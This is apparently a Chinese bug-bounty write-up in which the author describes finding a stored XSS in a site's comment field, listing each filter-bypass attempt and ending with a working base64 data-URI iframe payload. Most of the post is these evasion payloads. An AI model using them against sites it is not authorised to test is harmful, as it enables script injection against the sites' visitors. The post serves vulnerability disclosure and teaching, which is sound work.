某SRC提現額度竟然最低是兩千,而已經有750的我不甘心吶,這不得把這2000拿出來嘛。
之後我就瘋狂的挖這個站,偶然發現了一個之前沒挖出來的點,還有個存儲型XSS!
剛開始來到這個之前挖過但沒挖出來的站,看了一下感覺這站沒啥東西了啊,然後來到評論區又一次測試了一下
先簡單測試一下
心態:隨意吧
<img src=0>
結果是一空的,啥也沒有
普通的沒用肯定是過濾了,想着直接抓包測試吧更快些
抓包後發現編碼過
編碼後:%3Cimg+src%3D%22javascript%3Aalert('XSS')%22%3E
編碼前:<img src="javascript:alert('XSS')">
有個javascript
肯定是會攔截的,畢竟是大廠嘛
然後直接手打吧,去掉javascript
空格用+來表示吧 <img+src=0>
雖然是空的,但是發現源碼中是存在img的但是被轉義了,還是有些轉機的^_^
心態:有點小鬱悶
來嘗試繞過轉義
%00
代替空格
<img%00src=0%00>
繼續繞過
<img#src=0>
再來!
<img\/src=0>
有轉機啊!可以看到 /
被轉移成空格了
心態:興奮
直接上 <img/src=0/onerror=alert(/xss/)>
可惜,被攔截了,應該是關鍵字alert
接觸()
就攔截,onerror
接觸=
就攔截
繞過一下,加空格和 %00
會被轉義,試着用 /
來空格,alert
用 top['alert']
來代替
但是!不頂用啊
心態:失落
用過 /**/ %00 大小寫 eval 等
常用的都被幹掉了,結束了?!
這不一定要用 <img>
啊,來試試 <iframe>
心態:!!!柳暗花明又一村
接下來直接上吧,script
標籤肯定用不了了
試試 <iframe/src=vbscript:msgbox(123)></iframe>
能寫進去但是好像執行不了,繼續繞
心態:堅持,執着,絞盡腦汁
試了各種繞的方法,突然想到 明着不行,那就來暗的
明碼不行,那就試試base64編碼後的看看它會攔截不
<script>alert(/xss/)</script>
編碼一下
來直接上Payload <iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=></iframe>
完美大功告成!!這個套路我在這個站足足挖到3個存儲XSS,還是很開心的!_
我還是個萌新,初來乍到,大表哥們多多關照!第一次寫,有很多不完善,勿噴 _